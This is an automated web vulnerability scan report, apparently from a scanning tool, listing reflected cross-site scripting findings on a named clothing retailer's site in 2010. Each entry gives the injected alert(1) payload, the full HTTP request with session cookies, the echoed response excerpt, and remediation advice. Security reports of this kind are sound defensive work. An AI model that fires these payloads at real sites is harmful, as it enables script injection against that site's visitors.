<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/menf7881"-alert(1)-"0fee6082005/knitwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6277"-alert(1)-"d5b0d20f61b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/knitweard6277"-alert(1)-"d5b0d20f61b/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=tf1c4q1115nglm7718ghr1ebl0; expires=Tue, 09-Nov-2010 17:14:26 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/knitweard6277"-alert(1)-"d5b0d20f61b/"); //]]> ...[SNIP]...
1.118. http://www.fredperry.com/limited-edition/men/knitwear/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/knitwear/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 182cb"-alert(1)-"18aae9e5047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/knitwear/?182cb"-alert(1)-"18aae9e5047=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/knitwear/?182cb"-alert(1)-"18aae9e5047=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f33"-alert(1)-"55941b02465 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition70f33"-alert(1)-"55941b02465/men/liberty-blank-canvas/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:09:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=bak51qld4c0iqbgdtpogctnhl1; expires=Tue, 09-Nov-2010 17:09:45 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition70f33"-alert(1)-"55941b02465/men/liberty-blank-canvas/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443a9"-alert(1)-"e720bf77e2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men443a9"-alert(1)-"e720bf77e2a/liberty-blank-canvas/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:10:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=h813f9bc0t7s20s9plqkq52q26; expires=Tue, 09-Nov-2010 17:10:15 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men443a9"-alert(1)-"e720bf77e2a/liberty-blank-canvas/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55b43"-alert(1)-"a143e97bf8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/liberty-blank-canvas55b43"-alert(1)-"a143e97bf8f/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:10:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=tr5obeucie5eqkimd9lql3i1v1; expires=Tue, 09-Nov-2010 17:10:45 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/liberty-blank-canvas55b43"-alert(1)-"a143e97bf8f/"); //]]> ...[SNIP]...
1.122. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/liberty-blank-canvas/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec45f"-alert(1)-"932cb284aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/liberty-blank-canvas/?ec45f"-alert(1)-"932cb284aae=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aafcd"-alert(1)-"ca9f7a6b3df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editionaafcd"-alert(1)-"ca9f7a6b3df/men/new-styles/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:10:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=02flunniengit26kuohu44o1c7; expires=Tue, 09-Nov-2010 17:10:14 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editionaafcd"-alert(1)-"ca9f7a6b3df/men/new-styles/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c508"-alert(1)-"48cebfcb06f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men1c508"-alert(1)-"48cebfcb06f/new-styles/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:10:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=k1u51f38e8cm2j4krda42f2rm4; expires=Tue, 09-Nov-2010 17:10:37 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men1c508"-alert(1)-"48cebfcb06f/new-styles/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac829"-alert(1)-"50d8a14032a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/new-stylesac829"-alert(1)-"50d8a14032a/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=59kn1i9dtbvkogr6rl1mvbt6b7; expires=Tue, 09-Nov-2010 17:11:05 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/new-stylesac829"-alert(1)-"50d8a14032a/"); //]]> ...[SNIP]...
1.126. http://www.fredperry.com/limited-edition/men/new-styles/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/new-styles/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e7e"-alert(1)-"8e25b5ff5f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/new-styles/?76e7e"-alert(1)-"8e25b5ff5f5=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3bbe"-alert(1)-"0ef1f74b959 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editionc3bbe"-alert(1)-"0ef1f74b959/men/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ahcu0t9dl58c4ic4fiimqkn4j4; expires=Tue, 09-Nov-2010 17:13:16 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editionc3bbe"-alert(1)-"0ef1f74b959/men/shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b708"-alert(1)-"86e896e7b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men3b708"-alert(1)-"86e896e7b1/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=hajrgog5oo0eacbkbp05vslkm4; expires=Tue, 09-Nov-2010 17:13:52 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men3b708"-alert(1)-"86e896e7b1/shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c85"-alert(1)-"c119ad27ab7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/shirts66c85"-alert(1)-"c119ad27ab7/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=oba1oi45aktor2om73s3ubdli3; expires=Tue, 09-Nov-2010 17:14:13 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/shirts66c85"-alert(1)-"c119ad27ab7/"); //]]> ...[SNIP]...
1.130. http://www.fredperry.com/limited-edition/men/shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d34bf"-alert(1)-"05db03a5909 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/shirts/?d34bf"-alert(1)-"05db03a5909=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/shirts/?d34bf"-alert(1)-"05db03a5909=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163c5"-alert(1)-"603148a5fb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition163c5"-alert(1)-"603148a5fb5/men/shorts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:12:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ucne4doaae3jrhji44hi543ii4; expires=Tue, 09-Nov-2010 17:12:50 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition163c5"-alert(1)-"603148a5fb5/men/shorts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd734"-alert(1)-"5870bc30553 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/mencd734"-alert(1)-"5870bc30553/shorts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=cmprdodont2kar3gf3rj1dhch7; expires=Tue, 09-Nov-2010 17:13:11 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
